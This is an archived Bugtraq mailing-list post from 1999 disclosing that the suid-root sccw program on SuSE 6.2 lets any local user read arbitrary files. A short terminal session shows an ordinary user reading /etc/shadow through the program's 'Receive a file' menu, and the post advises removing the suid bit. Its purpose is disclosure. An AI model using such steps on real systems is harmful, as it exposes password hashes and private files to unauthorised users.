Bugtraq mailing list archives
SuSE 6.2 /usr/bin/sccw read any file
From: btellier () WEBLEY COM (Brock Tellier)
Date: Thu, 16 Sep 1999 19:28:02 -0500
Greetings, /usr/bin/sccw, suid root by default on SuSE 6.2, allows any user to read any file on the system. Sort of. Well, it's enough to read the text of almost anything. In capitals. Without punctuation. Check it out: xnec@susebox:/tmp > id uid=1001(xnec) gid=100(users) groups=100(users) xnec@susebox:/tmp > sccw ========================================================== Soundcard CW for Linux v1.1 Steven J. Merrifield, VK3ESM ========================================================== 1. Set the speed, currently = 10 2. Set the frequency, currently = 700 3. Set the volume, currently = 32 4. Set the delay value, currently = 3 5. Set the character set for random groups, currently = 1 6. Set the number of groups, currently = 5 7. Receive random character groups. 8. Receive a file. 9. QUIT ========================================================== Enter your choice : 8 Enter filename : /etc/shadow ROOTFGPZNZWZ5GWRG10850010000 BIN8902010000 DAEMON8902010000 ... etc. The printing of these lines takes a few seconds each, so be patient. While you're waiting, remove the suid-bit. Of course, getting the /etc/shadow file in all caps isn't instant root, but it's a start for someone out there. Besides, he can still read your mail in all caps, without punctuation. Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com
Current thread:
- re, anti btrom, (continued)
- re, anti btrom Martin Markovitz (Sep 08)
- Re: IE5 allows executing programs Paul L Schmehl (Sep 08)
- SDI AMD remote exploit for RH linux Thiago (Sep 02)
- Re: IE5 allows executing programs J MacCraw (Sep 07)
- Re: IE5 allows executing programs David LeBlanc (Sep 03)
- Re: IE5 allows executing programs Kragen Sitaker (Sep 05)
- Re: IE5 allows executing programs Jesper M. Johansson (Sep 08)
- Re: IE5 allows executing programs SysAdmin (Sep 08)
- Re: IE5 allows executing programs Haxor, Wikit (Sep 16)
- Two SuSE 6.2 local root exploits Brock Tellier (Sep 16)
- SuSE 6.2 /usr/bin/sccw read any file Brock Tellier (Sep 16)
- Fw: CERT Advisory CA-99.12 - Buffer Overflow in amd morex (Sep 16)
- More fun with WWWBoard David Weins (Sep 17)
- Re: More fun with WWWBoard Chris Ridd (Sep 20)
- Re: More fun with WWWBoard Mark Jeftovic (Sep 21)
- Re: More fun with WWWBoard Patrick Oonk (Sep 22)
- Re: More fun with WWWBoard Speed (Sep 24)
- Re: More fun with WWWBoard Mark Jeftovic (Sep 26)
- Microsoft Security Bulletin (MS99-037) Aleph One (Sep 25)
- Internet Explorer 5.0 & AOL Instant Messenger 3.x (latest version) Bug forcing Win98 to crash remotely webmaster (Sep 22)
- Re: Internet Explorer 5.0 & AOL Instant Messenger 3.x (latest version) Bug forcing Win98 to crash remotely Peter Haglund (Sep 24)